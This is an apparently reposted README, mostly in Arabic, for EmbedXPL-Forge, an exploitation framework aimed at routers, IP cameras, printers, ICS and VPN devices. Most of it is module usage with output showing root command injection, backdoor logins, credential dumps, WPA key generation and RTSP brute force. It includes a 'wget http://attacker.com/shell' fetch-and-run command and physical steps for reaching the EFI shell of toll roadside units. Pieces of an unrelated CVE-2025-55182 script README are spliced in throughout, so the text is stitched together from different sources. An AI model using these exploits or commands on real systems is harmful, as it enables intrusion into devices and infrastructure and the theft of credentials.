exf > use exploits/ics/ur_polyscope5_dashboard_cmd_injection_cve_2026_8153 exf (UR PolyScope5 Injection) > set target 192.168.1.50 exf (UR PolyScope5 Injection) > set cmd "id" exf (UR PolyScope5 Injection) > run [] Connecting to PolyScope Dashboard on 192.168.1.50:29999 [+] PolyScope Dashboard Server detected [] Attempting OS command injection (CVE-2026-8153) [+] Command injection confirmed! [+] Output: uid=0(root) gid=0(root)

GNU InetUtils telnetd auth bypass (CVE-2026-24061, CVSS 9.8, unauth root)

exf > use exploits/embedded_os/gnu_inetutils_telnetd_auth_bypass_cve_2026_24061 exf (InetUtils telnetd Bypass) > set target 192.168.1.1 exf (InetUtils telnetd Bypass) > set cmd "id" exf (InetUtils telnetd Bypass) > run [*] Sending CVE-2026-24061 bypass payload [+] Authentication bypass succeeded! Shell prompt detected [+] Command output: uid=0(root)

Metis maritime IoT (CVE-2026-2248, CVSS 9.8, unauth root shell)

exf > use exploits/specialized/metis_wic_unauth_rce_cve_2026_2248 exf (Metis WIC RCE) > set target 10.1.2.3 exf (Metis WIC RCE) > run

Cisco IOS XE WLC hardcoded JWT (CVE-2025-20188, CVSS 10.0)

exf > use exploits/routers/cisco/ios_xe_wlc_jwt_rce_cve_2025_20188 exf (Cisco WLC JWT RCE) > set target 10.0.0.1 exf (Cisco WLC JWT RCE) > set port 443 exf (Cisco WLC JWT RCE) > run

root@kitploit:~
### أمثلة على ترسانة الطابعات```
# HP PJL full scan (native — no external tools)
exf > use exploits/printers/hp/hp_laserjet_pjl_scan_native
exf (HP PJL Scanner) > set target 192.168.1.100
exf (HP PJL Scanner) > run
[+] PJL interface reachable
[+] INFO ID: HP LASERJET PRO M402N
INFO STATUS     : READY
INFO PAGECOUNT  : 12847
INFO MEMORY     : 512000 BYTES

# Ricoh HTTP buffer overflow (CVE-2024-34161, CVSS 9.8)
exf > use exploits/printers/ricoh/ricoh_http_bof_cve_2024_34161
exf (Ricoh HTTP BOF) > set target 192.168.1.101
exf (Ricoh HTTP BOF) > run

# Brother LDAP credential passback
exf > use exploits/printers/brother/brother_ldap_smb_passback
exf (Brother LDAP Passback) > set target 192.168.1.102
exf (Brother LDAP Passback) > set attacker_ip 192.168.1.10
exf (Brother LDAP Passback) > run
[+] LDAP server redirected — wait for printer authentication

تغطية كلمات المرور الخلفية / المصنعية

أكثر من 27 وحدة استغلال تستهدف كلمات المرور المصنعية، والأبواب الخلفية المضمّنة، وخوارزميات توليد مفاتيح WPA الافتراضية، ونواقل CSRF لاختطاف DNS عبر أجهزة توجيه SOHO القديمة والحديثة. أمثلة رئيسية:```

EasyBox (Arcadyan) — WPA2 default key from MAC (factory algorithm)

exf > use exploits/routers/easybox/easybox_wpa_keygen exf (EasyBox WPA Keygen) > set target 192.168.1.1 exf (EasyBox WPA Keygen) > run [*] No MAC supplied — attempting to extract from web UI... [+] MAC found: AA:BB:CC:DD:EE:FF [+] Device MAC : AA:BB:CC:DD:EE:FF [+] WPA2 PSK : 3f2d9a1b

Seagate NAS — Ghost PHP unauthenticated RCE (CVE-2014-8684)

exf > use exploits/routers/seagate/seagate_nas_php_backdoor exf (Seagate Ghost PHP) > set target 192.168.1.100 exf (Seagate Ghost PHP) > set cmd "id; uname -a" exf (Seagate Ghost PHP) > run [*] Sending command via Ghost PHP backdoor: 'id; uname -a' [+] RCE successful — output: uid=0(root) gid=0(root) groups=0(root) Linux NAS 3.10.14 #1 SMP armv7l

Alpha Networks / ZTE — web_shell_cmd.gch backdoor

exf > use exploits/routers/alpha_networks/web_shell_cmd_rce exf (Alpha Networks web_shell_cmd RCE) > set target 192.168.1.1 exf (Alpha Networks web_shell_cmd RCE) > set cmd "cat /etc/passwd" exf (Alpha Networks web_shell_cmd RCE) > run [*] Sending command to /web_shell_cmd.gch: 'cat /etc/passwd' [+] Response from backdoor shell: root❌0:0:root:/root:/bin/sh ...

RuggedCom — factory backdoor password generator (FD 2012/Apr/277)

exf > use exploits/routers/ruggedcom/ruggedcom_factory_password exf (RuggedCom Factory Password) > set target 192.168.1.1 exf (RuggedCom Factory Password) > set serial RA000000 exf (RuggedCom Factory Password) > run [+] Serial Number : RA000000 [+] Backdoor user : factory [+] Backdoor pass : 7f3d9a2b

Alcatel-Lucent OmniPCX Enterprise — masterCGI RCE

exf > use exploits/routers/alcatel_lucent/omnipcx_masterCGI_rce exf (OmniPCX RCE) > set target 192.168.1.10 exf (OmniPCX RCE) > set cmd "id" exf (OmniPCX RCE) > run [*] Injecting command: 'id' via /cgi-bin/masterCGI?ping=127.0.0.1&user=;id; [+] Response (command output may be embedded): uid=0(root) ...

TRENDnet camera — unauthenticated MJPEG live stream

exf > use exploits/routers/trendnet/camera_mjpeg_unauth exf (TRENDnet MJPEG) > set target 192.168.1.50 exf (TRENDnet MJPEG) > run [+] LIVE STREAM accessible (no auth): /anony/mjpg.cgi [+] Stream URL: http://192.168.1.50:80/anony/mjpg.cgi

Netgear WG602 — hardcoded backdoor credentials

exf > use exploits/routers/netgear/wg602_superman_backdoor exf (WG602 Backdoor) > set target 192.168.1.1 exf (WG602 Backdoor) > run [+] Backdoor login SUCCESS: super:5777364 [*] Admin panel: http://192.168.1.1:80/

root@kitploit:~
**جميع الوحدات/الموردين الجدد الـ 27:**
`alcatel_lucent` · `alpha_networks` · `astoria` · `binatone` · `ddwrt` · `easybox` · `ee` · `freebox` · `mifi` · `motorola` · `observa` · `ruggedcom` · `seagate` · `sitecom` · `starbridge` · `ubee` · `unicorn` · `utstarcom` · `zoom` · بالإضافة إلى سدّ الفجوات في belkin و netgear و trendnet.


## بنية الوحدة```
embedxpl/
├── core/
│   ├── rtsp/          # RTSP camera engine
│   │   ├── client.py  # Raw socket RTSP client (OPTIONS/DESCRIBE/auth/TLS/HTTP-tunnel)
│   │   ├── attacker.py# 5-phase attack pipeline (route→auth→creds→validate→re-attack)
│   │   ├── scanner.py # Network discovery (nmap/masscan/direct), CIDR/range expansion
│   │   └── models.py  # RTSPStream dataclass, AuthType enum
│   └── poly/
│       ├── compiler.py# CCompiler — runtime C/C++ compilation (gcc/clang/mingw/cross)
│       └── runner.py  # PolyRunner — Ruby/Node/PHP/Bash/Perl + Metasploit + ExploitDB
├── modules/
│   ├── creds/             # Credential testing (FTP, SSH, Telnet, HTTP, SNMP)
│   ├── exploits/
│   │   ├── cameras/       # IP camera exploits by vendor
│   │   │   ├── multi/     # Multi-vendor (RTSP attack engine, P2P, ONVIF)
│   │   │   ├── hikvision/ # Hikvision (CVE-2021-36260, CVE-2017-7921, ...)
│   │   │   ├── dahua/     # Dahua + OEMs (CVE-2021-33044, CVE-2020-25078, ...)
│   │   │   ├── axis/      # Axis (CVE-2018-10660, ...)
│   │   │   ├── reolink/   # Reolink (CVE-2021-40655, CVE-2022-30600)
│   │   │   ├── amcrest/   # Amcrest (CVE-2019-3950)
│   │   │   ├── uniview/   # Uniview UNV (CVE-2024-37630)
│   │   │   ├── tapo/      # TP-Link Tapo (CVE-2021-4045)
│   │   │   ├── annke/     # ANNKE DVR/NVR (CVE-2021-32941)
│   │   │   ├── swann/     # Swann DVR/NVR (default creds + RTSP)
│   │   │   └── edimax/    # Edimax IC-7100 (CVE-2025-1316, CISA KEV)
│   │   ├── firmware/      # Firmware flash bypass (NETGEAR, TP-Link, D-Link, ASUS)
│   │   ├── nas/           # NAS exploits (QNAP, D-Link NAS, Zyxel)
│   │   ├── routers/       # Router exploits by vendor (85 vendor folders — see full list below)
│   │   ├── vpn/           # VPN/firewall appliances (Ivanti, Fortinet, SonicWall)
│   │   ├── switches/      # Switch exploits (Cisco, D-Link, NETGEAR)
│   │   └── soho_edge/     # SOHO edge device exploits
│   ├── scanners/          # Network scanning and AutoPwn
│   ├── payloads/          # Reverse/bind shells (multi-arch)
│   ├── encoders/          # Payload encoding (Base64, Hex)
│   └── generic/           # CVE lookup, SNMP, UPnP, SSDP, wordlist tools
├── nse/                   # NSE script manager (Python)
│   ├── manager.py         # NSEManager class — install/uninstall/list/run
│   └── __main__.py        # CLI: python -m embedxpl.nse
├── resources/
│   └── rtsp/
│       ├── routes.txt      # 195+ RTSP stream paths
│       └── credentials.json# 80+ default username:password pairs
└── data/
    └── oui.txt             # IEEE OUI database for MAC-to-vendor lookup

nse/                        # Nmap NSE Lua scripts (pip install embedxpl[nse])
├── embedxpl-rtsp-discover.nse
├── embedxpl-camera-identify.nse
├── embedxpl-hikvision-vuln.nse
├── embedxpl-dahua-vuln.nse
├── embedxpl-rtsp-creds.nse
├── embedxpl-iot-cve-check.nse
└── embedxpl-camera-snapshot.nse

تغطية الوحدات الموسّعة

يوثّق هذا القسم وحدات أجهزة مزوّدي خدمة الإنترنت، واستغلالات كلمات المرور الخلفية/المصنعية، وإطار عمل عميل RTSP، وأدوات OSINT، والوحدات الأمنية المتخصصة.


وحدات أمن أجهزة مزوّدي خدمة الإنترنت

استغلالات وماسحات تستهدف أجهزة CPE الصادرة عن مزوّدي خدمة الإنترنت وكاميرات IP التي عادةً ما ينشرها مزوّدو الإنترنت (أجهزة ONT القائمة على Sercomm، وأجهزة GPON CPE، والأجهزة التي تحمل علامة مزوّد خدمة الإنترنت).

أمثلة الاستخدام:```bash

ZTE ZXHN H298A Credential Dump

embedxpl use routers/zte/zxhn_h298a_cred_dump_cve_2026_34474 embedxpl (ZXHNCred) > set rhost 192.168.1.1 embedxpl (ZXHNCred) > run

Expected output (vulnerable device):

[+] Connected to 192.168.1.1:80 [+] Sending ETHCheat request: GET /getpage.lua?pid=1000&ETHCheat=1 [!] VULNERABLE: Credentials exposed Admin Password: admin123 WLAN PSK: MyWifiPass SSID: ZTE_Router_ABC

Sample output (not vulnerable):

[-] No credential fields found in response [-] Target may be patched or different firmware

root@kitploit:~
## التثبيت

```bash
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python3 cve_2025_55182.py --target https://example.com

الخيارات

الخيارالوصف
--targetعنوان URL الهدف
--proxyبروكسي HTTP للطلبات
--timeoutمهلة الطلب بالثواني

مثال

root@kitploit:~
python3 cve_2025_55182.py --target https://example.com --verbose

إخلاء المسؤولية

هذه الأداة مخصصة لأغراض الاختبار الأمني المصرح به فقط.```bash

Intelbras IWR LuCI RPC RCE

embedxpl use routers/intelbras/iwr_luci_rpc_rce embedxpl (IWRLuci) > set rhost 192.168.0.1 embedxpl (IWRLuci) > set cmd "id" embedxpl (IWRLuci) > run

Expected output:

[+] LuCI RPC endpoint found at /cgi-bin/luci/rpc/sys [+] RCE via sys.exec: uid=0(root) gid=0(root)

root@kitploit:~
## التثبيت

```bash
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python3 cve_2025_55182.py --help

الفحص الأساسي

root@kitploit:~
python3 cve_2025_55182.py -u https://target.example.com

مع ملف تعريف ارتباط الجلسة

root@kitploit:~
python3 cve_2025_55182.py -u https://target.example.com -c "session=abc123"

مع وكيل

root@kitploit:~
python3 cve_2025_55182.py -u https://target.example.com -p http://127.0.0.1:8080

مع مهلة مخصصة

root@kitploit:~
python3 cve_2025_55182.py -u https://target.example.com -t 30

مع التحقق من SSL معطّل

root@kitploit:~
python3 cve_2025_55182.py -u https://target.example.com -k

مع الإخراج إلى ملف

root@kitploit:~
python3 cve_2025_55182.py -u https://target.example.com -o result.txt

مع الوضع المطوّل

root@kitploit:~
python3 cve_2025_55182.py -u https://target.example.com -v

الخيارات

مثال الإخراج

root@kitploit:~
[*] Target: https://target.example.com
[*] Checking vulnerability...
[+] Target is vulnerable to CVE-2025-55182
[+] Payload executed successfully
[+] Response: uid=33(www-data) gid=33(www-data) groups=33(www-data)

استكشاف الأخطاء وإصلاحها

فشل الاتصال

تأكد من إمكانية الوصول إلى الهدف ومن صحة عنوان URL.

انتهت مهلة الطلب

قم بزيادة المهلة باستخدام الخيار -t.

خطأ في شهادة SSL

استخدم الخيار -k لتخطي التحقق من SSL.

لم يتم اكتشاف ثغرة

قد يكون الهدف مصححًا أو قد لا يكون عرضة لهذه الثغرة المحددة.

إخلاء المسؤولية

هذه الأداة مخصصة لأغراض الاختبار الأمني المصرح به فقط. يجب عليك الحصول على إذن كتابي صريح قبل اختبار أي نظام لا تملكه أو لا تملك إذنًا صريحًا لاختباره. قد يكون الاستخدام غير المصرح به غير قانوني.

الترخيص

هذا المشروع مرخص بموجب ترخيص MIT - راجع ملف LICENSE للحصول على التفاصيل.

المراجع

  • CVE-2025-55182
  • توثيق React
  • Next.js الأمان```bash

Brazilian ISP multi-vendor scanner

embedxpl use scanners/specialized/br_isp_scanner embedxpl (BRISPScan) > set target 192.168.0.0/24 embedxpl (BRISPScan) > run

root@kitploit:~
**ملاحظات:** يؤثر CVE-2026-34474 على ZTE ZXHN H298A 1.1 و H108N 2.6. لا يتطلب مصادقة.
**قانوني:** استخدمه فقط على الأجهزة التي تملكها أو لديك تفويض كتابي لاختبارها.

---

### وحدات الباب الخلفي للموجهات القديمة وكلمات مرور المصنع

استغلالات الباب الخلفي للموجهات الكلاسيكية وكلمات مرور المصنع منفذة بصيغة وحدة EmbedXPL-Forge.

| الجهاز | CVE / المرجع | مسار الوحدة | نوع الهجوم |
|--------|----------------|-------------|-------------|
| Cobham Aviator 700 SATCOM | CVE-2014-2943 | `exploits/specialized/vsat/cobham_aviator_admin_reset_cve_2014_2943` | إعادة تعيين كلمة مرور المسؤول (بدون مصادقة) |
| Huawei HG8245H | - | `osint/keygen/huawei_hg8245_wpa_keygen` | مولّد مفتاح WPA الافتراضي |
| Alcatel-Lucent OmniPCX Enterprise | - | `exploits/voip/alcatel_lucent/omnipcx_enterprise_mastercgi_rce` | تنفيذ أوامر عن بُعد عبر masterCGI بدون مصادقة |
| Linksys E-Series (The Moon) | EDB-31683 | `exploits/routers/linksys/eseries_themoon_rce_tmunblock` | تنفيذ أوامر عن بُعد عبر tmUnblock.cgi |
| NETGEAR DGN2200 | EDB-24665 | `exploits/routers/netgear/dgn2200_open_telnetd_rce` | تنفيذ أوامر عن بُعد عبر open-telnetd بدون مصادقة |
| Siemens FlexiISN | - | `exploits/routers/siemens/flexiisn_auth_bypass` | تجاوز المصادقة |
| Thomson BTHomeHub | - | `exploits/routers/thomson/bthomehub_voice_hijack` | اختطاف إعدادات VoIP |
| AT&T 2Wire Gateway | - | `exploits/routers/two_wire/atandt_gateway_crlf_dos` | حقن CRLF / حجب الخدمة |

**أمثلة الاستخدام:**```bash
# Cobham Aviator admin reset (VSAT / Satellite terminal)
embedxpl use specialized/vsat/cobham_aviator_admin_reset_cve_2014_2943
embedxpl (CobhamReset) > set rhost 192.168.1.1
embedxpl (CobhamReset) > run

# Expected output:
[+] Connected to Cobham Aviator 700 interface
[+] Sending unauthenticated admin reset request
[!] VULNERABLE: Admin password reset to default

# Linksys eSeries The Moon RCE
embedxpl use routers/linksys/eseries_themoon_rce_tmunblock
embedxpl (TheMoon) > set rhost 192.168.1.1
embedxpl (TheMoon) > set cmd "busybox wget http://attacker.com/shell -O /tmp/sh && chmod +x /tmp/sh && /tmp/sh"
embedxpl (TheMoon) > run

# Huawei HG8245H WPA keygen
embedxpl use osint/keygen/huawei_hg8245_wpa_keygen
embedxpl (HuaweiKeygen) > set ssid "HG8245H-ABCDEF"
embedxpl (HuaweiKeygen) > run
# Output: [+] Predicted WPA key: xA7z3k9P

ملاحظات: تستغل دودة Moon (Linksys E-Series CVE) الثغرة في tmUnblock.cgi دون مصادقة على البرامج الثابتة < 2.0.08. قانوني: استخدمها فقط على الأجهزة التي تملكها أو لديك تفويض كتابي لاختبارها.


إطار عمل عميل RTSP

مكتبة عميل RTSP/1.0 وفق RFC 2326 مكتوبة بلغة Python خالصة تُستخدم كأساس لجميع وحدات مهاجمة كاميرات RTSP.

الوحدة: network/rtsp/rtsp_client.py - فئة RTSPClient

الميزات:

  • طرق OPTIONS و DESCRIBE و SETUP و PLAY و TEARDOWN
  • مصادقة Basic و Digest (RFC 2617)
  • تحليل وصف جلسة SDP
  • إعادة الاتصال التلقائي وإدارة مهلة المقبس
  • دعم مدير السياق (with RTSPClient(...) as client)

مثال على الاستخدام:```bash

Direct Python API usage

python3 -c " from embedxpl.modules.network.rtsp.rtsp_client import RTSPClient with RTSPClient('192.168.1.10', 554, timeout=5) as client: resp = client.describe('/live/ch0') if resp.status_code == 200: sdp = client.parse_sdp(resp.body) print(f'Streams: {[s.media_type for s in sdp.streams]}') "

root@kitploit:~
## التثبيت

```bash
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python3 main.py --help

الإعداد

قم بتحرير ملف config.yaml لضبط الإعدادات الخاصة بك.```bash

RTSP credential brute force (uses RTSPClient internally)

embedxpl use network/rtsp/rtsp_cred_brute embedxpl (RTSPBrute) > set rhost 192.168.1.10 embedxpl (RTSPBrute) > set rport 554 embedxpl (RTSPBrute) > set path /live/ch0 embedxpl (RTSPBrute) > run

Expected output:

[+] Trying admin:admin ... 401 Unauthorized [+] Trying admin:12345 ... 200 OK [!] VALID: admin:12345

root@kitploit:~
**المتطلبات:** Python 3.8+، بدون تبعيات خارجية.

---

### وحدة البحث عن FCC-ID

وحدة OSINT تستعلم عن قاعدة بيانات تصريح المعدات الخاصة بـ FCC لاسترداد تفاصيل الجهاز من رموز FCC ID الموجودة على ملصقات الأجهزة.

**الوحدة:** `osint/fcc_id_lookup.py`

**مثال الاستخدام:**```bash
embedxpl use osint/fcc_id_lookup
embedxpl (FCCLookup) > set fcc_id "PD5-WNR3500U"
embedxpl (FCCLookup) > run

# Expected output:
[+] FCC ID: PD5-WNR3500U
    Grantee: NETGEAR Inc.
    Product: WNR3500U Wireless-N Gigabit Router
    Frequency: 2.4GHz / 5GHz
    Authorization: OET-65C (mobile device)
    Test Lab: SGS
    Grant Date: 2009-11-18
    Internal Photos: [URL]
    External Photos: [URL]
    Test Reports: [URL]

نصائح:

  • تُطبع معرّفات FCC على ملصقات الأجهزة (بصيغة: GRANTEE_CODE-PRODUCT_CODE)
  • استخدمها لتحديد أجهزة OEM، أو أساس البرنامج الثابت، أو سلسلة التوريد
  • ادمجها مع osint/github_recon للعثور على مستودعات البرامج الثابتة العامة الخاصة بالجهاز

المتطلبات: اتصال بالإنترنت، مكتبة requests.


مولّد روابط URL للكاميرا

يولّد روابط URL المعروفة لبثّ الكاميرا بناءً على الشركة المصنّعة والطراز وإصدار البرنامج الثابت، باستخدام صيغة قاعدة بيانات كاميرات iSpy.

الوحدة: osint/camera_url_generator.py

مثال على الاستخدام:```bash embedxpl use osint/camera_url_generator embedxpl (CameraURL) > set vendor "hikvision" embedxpl (CameraURL) > set model "DS-2CD2143G2" embedxpl (CameraURL) > run

Expected output:

[+] Known stream URLs for Hikvision DS-2CD2143G2: [1] rtsp://:554/Streaming/Channels/101 [2] rtsp://:554/Streaming/Channels/102 [3] rtsp://:554/h264/ch1/main/av_stream [4] http:///ISAPI/Streaming/channels/1/picture [5] http:///onvif/device_service

Generate wordlist for RTSP brute force

embedxpl (CameraURL) > set output_file /tmp/hikvision_routes.txt embedxpl (CameraURL) > run

root@kitploit:~
**نصائح:**
- ادمج مع `network/rtsp/rtsp_route_brute` لحصر البث المباشر
- يدعم أكثر من 300 من مصنّعي الكاميرات من قاعدة بيانات iSpy المفتوحة للكاميرات
- استخدم `set all_vendors true` لتفريغ جميع عناوين URL المعروفة

---

### وحدات أمن إنفاذ المرور

وحدات تستهدف البنية التحتية لإنفاذ المرور (وحدات RSU على جانب الطريق، أنظمة الرادار، كاميرات ANPR).

#### Kapsch TrafficCom RSU EFI Shell (CVE-2025-25734)

**الوحدة:** `exploits/specialized/traffic_enforcement/kapsch_rsu_efi_shell_cve_2025_25734`

**الثغرة:** تفتقر وحدات Kapsch على جانب الطريق (RSUs) المستخدمة في تحصيل الرسوم الإلكترونية إلى فرض UEFI Secure Boot وحماية كلمة مرور BIOS، مما يسمح للمهاجمين الماديين بالدخول إلى صدفة EFI التفاعلية والوصول إلى نظام الملفات بالكامل.

**التأثير:** استخراج الإعدادات، سرقة مفتاح TLS الخاص، تثبيت برمجيات خبيثة، تجاوز إنفاذ الرسوم.

**مثال على الاستخدام:**```bash
# Network reachability check (management interface detection)
embedxpl use specialized/traffic_enforcement/kapsch_rsu_efi_shell_cve_2025_25734
embedxpl (KapschRSU) > set rhost 10.0.0.50
embedxpl (KapschRSU) > check

# Expected output (management interface exposed):
[+] Kapsch RSU management interface detected on 10.0.0.50:80
[!] Banner indicator: 'TrafficCom RSU' found
[*] NOTE: Full exploitation requires physical on-site access

# Assessment report
embedxpl (KapschRSU) > run
# Outputs: attack steps, mitigations checklist, risk level

خطوات الاستغلال المادي:

  1. افتح غلاف RSU (براغي كاشفة للعبث)
  2. وصّل لوحة مفاتيح USB وشاشة بمنفذ RSU الرئيسي
  3. أعد تشغيل الطاقة - اضغط ESC/DEL/F2 أثناء POST
  4. تنقّل: Boot Manager -> EFI Internal Shell
  5. ادخل إلى نظام الملفات: fs0:\efi\config\ لاستخراج الإعدادات

المتطلبات: وصول مادي إلى عتاد RSU (شاشة + لوحة مفاتيح USB)، أو وصول شبكي إلى واجهة الإدارة لكشف البانر. قانوني: الوصول غير المصرح به إلى البنية التحتية لإنفاذ الرسوم جريمة جنائية. استخدمه فقط على الوحدات التي تملكها أو لديك تفويض كتابي صريح لتقييمها.


بنية الإطار (v3.1.0)

بنية المكونات

عرض طبقي كامل للإطار: طبقة CLI، المحرك الأساسي (المنسّق، عملاء البروتوكول، محركات الصدفة)، طبقة الاستخبارات (ML، OUI، قاعدة بيانات CVE)، بوابات الجودة، وترسانة تضم أكثر من 2800 وحدة منظمة حسب الفئة.

EmbedXPL-Forge Component Architecture v3.1.0

تدفق التدقيق والاستغلال

تدفق البيانات من البداية إلى النهاية من إدخال الهدف عبر الاكتشاف، والبصمة، واختيار الوحدة، والاستغلال، وإعداد التقارير.

EmbedXPL-Forge Exploitation Flow v3.1.0

خرائط البنية وسطح الهجوم

خرائط سطح الهجوم التي تُظهر تغطية الوحدات لكل ناقل وصول، بأسلوب مخططات الأمن التشغيلي. الملفات المصدرية في docs/diagrams/architecture/.

نظرة عامة على بنية الوحدات

EmbedXPL-Forge Architecture Overview

سلاسل هجوم مجموعات APT

APT Group Attack Chains

سطح هجوم موجّهات SOHO

SOHO Router Attack Surface

سطح هجوم TP-Link (حملة APT28/GRU)

TP-Link APT28 Attack Surface

سطح هجوم MikroTik RouterOS

MikroTik Attack Surface

سطح هجوم GPON ONT (Huawei EG8145)

GPON ONT Attack Surface

المتطلبات

  • Python 3.8+
  • اختياري: nmap (binary) لتعزيز اكتشاف الشبكة وسكربتات NSE
  • اختياري: masscan لاكتشاف RTSP عالي السرعة
  • اختياري: gcc/clang لترجمة وقت تشغيل PolyExploit C/C++
  • اختياري: msfconsole لتكامل Metasploit عبر PolyRunner

اعتماديات Python (تُثبَّت تلقائيًا): requests, paramiko, pysnmp, pycryptodome, scapy, colorama, rich, python-nmap, aiohttp

إضافات NSE (pip install "embedxpl[nse]"): python-nmap (مضمّن بالفعل في النواة)

القائمة الكاملة: requirements.txt

إخلاء المسؤولية القانونية

EmbedXPL-Forge مخصص للاختبار الأمني والبحث المصرح به فقط. استخدم هذه الأداة حصريًا على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام.

الترخيص

ترخيص BSD — راجع LICENSE للتفاصيل.

التواصل

الدعم / الاستفسارات العامة: [email protected] المشكلات الأمنية: SECURITY.md


André Henrique

GitHub@mrhenrike
X / Twitter@mrhenrike
LinkedInmrhenrike

União Geek

Websiteuniaogeek.com.br
Bloguniaogeek.com.br/blog

الترخيص: BSD-3-Clause License - Copyright (c) 2026 União Geek إنشاء: André Henrique (@mrhenrike) | União Geek

Leia em Português - Command coverage - Wiki

تنزيل الأداة
اكتشاف الشبكة
  • إدارة الجلسات — سجل فحص دائم لكل مضيف (IP+MAC)، استئناف/إعادة التشغيل، فهرس كامل للنتائج
  • وحدات autopwn المتسلسلة — سلاسل استغلال متعددة المراحل خاصة بالبائعين (Huawei EG8145X6، CUPS Pwn2Own، Lexmark Pwn2Own، إلخ)
  • 7 بوابات جودة آلية — يضمن tools/phase_gate.py اجتياز كل وحدة لفحوصات الاستيراد ومكافحة الإيجابيات الكاذبة والمراجع وجودة الكود قبل الدمج
  • النوعالتغطيةالوصف
    أجهزة التوجيه / GPON ONT / CPEأكثر من 580 وحدةأجهزة توجيه SOHO، بوابات المؤسسات، GPON CPE/ONT (التركيز الأساسي)
    كاميرات IP / NVR / DVRأكثر من 60 وحدةHikvision، Dahua، Axis، Reolink، Amcrest، Uniview، Tapo، Swann، ANNKE، Edimax، Intelbras، Grandstream، Foscam، Xiongmai OEM، MVPower، وأكثر من 20 أخرى
    الطابعات / MFPأكثر من 185 وحدةHP، Canon، Lexmark، Xerox، Ricoh، Brother، Epson، Kyocera، Samsung؛ سلاسل IPP/PJL/LPD/WSD/CUPS
    NAS (التخزين الشبكي)أكثر من 20 وحدةQNAP، Synology، D-Link NAS، Zyxel NAS
    أجهزة VPN / جدار الحماية / NGFW202 وحدةPalo Alto، Fortinet، Cisco ASA/FTD/FMC، Check Point، Juniper، SonicWall، Sophos، WatchGuard، Zyxel، F5 BIG-IP، Citrix/NetScaler، Ivanti، Pulse Secure، pfSense، OPNsense، Barracuda، Imperva، MikroTik، Huawei USG، Stormshield، Hillstone، Sangfor، H3C، Radware، Symantec ProxySG، Trend Micro TippingPoint، Trellix، Arista EOS، OpenVPN AS، Phoenix Contact mGuard، Siemens SCALANCE، Moxa EDR، VyOS، IPFire، Kerio، Cisco Meraki، Array Networks + وحدات تجاوز بروتوكول OT/ICS
    المحولات L2/L33 وحداتالمحولات المُدارة (Cisco، D-Link، NETGEAR)
    SOHO Edge9 وحداتأجهزة توجيه السفر، NAS، نقاط الوصول اللاسلكية
    ICS / OT / الصناعيةأكثر من 35 وحدةPLCs، SCADA، Modbus، S7comm، EtherNet/IP، Universal Robots PolyScope 5
    المنزل الذكي / البحريأكثر من 10 وحداتeNet SMART HOME، OpenRemote IoT، Metis maritime WIC/DFS
    نظام التشغيل المدمجأكثر من 25 وحدةRIOT OS، OpenWrt، VxWorks، QNX، أجهزة wolfSSL، Tuya Arduino SDK
    الأمرالوصف
    use <module>اختيار وحدة
    show optionsعرض الخيارات القابلة للتكوين
    show infoعرض بيانات الوصف والمراجع الخاصة بالوحدة
    show devicesعرض أنواع الأجهزة المدعومة
    set <option> <value>تكوين خيار
    checkالتحقق مما إذا كان الهدف عرضة للثغرة
    runتنفيذ الوحدة
    search <term>البحث عن الوحدات حسب الكلمة المفتاحية
    discover [subnet] [--timing T0-T5] [--fresh]فحص الشبكة الفرعية، وتحديد بصمة الأهداف، واقتراح الوحدات
    sessions list|show|delete|export|purgeإدارة سجل الفحص المستمر لكل مضيف
    aptعرض مجموعات APT مع سلاسل الهجوم القابلة للتكرار
    apt show <group>عرض تفاصيل سلسلة الهجوم (MITRE ATT&CK، وCVEs، والوحدات)
    apt search <device|CVE>البحث عن مجموعات APT التي تستهدف جهازًا أو ثغرة CVE
    apt run <group> [#]تنفيذ سلسلة هجوم APT (كاملة أو هجوم محدد)
    الملف التعريفيالتأخيرحالة الاستخدام
    T0paranoid — 300sالتهرب من IDS
    T1sneaky — 15sعمليات تدقيق هادئة
    T2polite — 2sتأثير أدنى
    T3normal — 0.5sالافتراضي
    T4aggressive — 0.1sفحوصات LAN سريعة
    T5insane — 0sCTF / مختبر فقط
    الوضعالمنفذالفئة / الطريقة
    rtsp554RTSPClient(host, port)
    rtsps443/8443RTSPClient(host, port, use_tls=True)
    http80/8080RTSPClient(host, port, tunnel_http=True)
    https443/8443RTSPClient(host, port, use_tls=True, tunnel_http=True)
    autoanyRTSPClient.from_scheme(host, port, "http")
    الجهازCVEمسار الوحدةنوع الهجوم
    TP-Link TL-SC3171 / SC4171 / SC4171GCVE-2013-2573exploits/cameras/tplink/tl_sc_series_cmd_inject_cve_2013_2573حقن الأوامر (بدون مصادقة)
    TP-Link TL-SC3171 / SC3130CVE-2013-2581exploits/cameras/tplink/tl_sc_series_unauth_firmware_upload_cve_2013_2581رفع البرامج الثابتة بدون مصادقة
    D-Link DCS-932LCVE-2026-36983exploits/cameras/dlink/dcs_932l_light_sensor_rce_cve_2026_36983تنفيذ تعليمات برمجية عن بُعد عبر مستشعر الضوء
    D-Link DCS-932LCVE-2025-5573exploits/cameras/dlink/dcs_932l_admin_cmd_inject_cve_2025_5573حقن الأوامر في لوحة الإدارة
    D-Link DCS-933LCVE-2026-2218exploits/cameras/dlink/dcs_933l_admin_cmd_inject_cve_2026_2218حقن الأوامر في لوحة الإدارة
    ZTE ZXHN H267N / H268NCVE-2026-34473exploits/routers/zte/zxhn_h267n_h268n_dos_cve_2026_34473حجب الخدمة
    ZTE ZXHN H298A / H108NCVE-2026-34474exploits/routers/zte/zxhn_h298a_cred_dump_cve_2026_34474استخراج بيانات الاعتماد (ETHCheat)
    Intelbras IWR routers-exploits/routers/intelbras/iwr_luci_rpc_rceتنفيذ تعليمات برمجية عن بُعد بدون مصادقة عبر LuCI RPC
    Multi-vendor BR ISP scanner-scanners/specialized/br_isp_scannerاكتشاف نشط + فحص الثغرات
    --verboseتمكين الإخراج المفصل
    الخيارالوصف
    -u, --urlعنوان URL الهدف (مطلوب)
    -c, --cookieملف تعريف ارتباط الجلسة
    -p, --proxyوكيل HTTP/HTTPS
    -t, --timeoutمهلة الطلب بالثواني (افتراضي: 10)
    -k, --insecureتعطيل التحقق من شهادة SSL
    -o, --outputحفظ النتائج في ملف
    -v, --verboseتمكين الإخراج المطوّل
    -h, --helpعرض رسالة المساعدة
    GitHubUniao-Geek
    Instagram@uniaogeek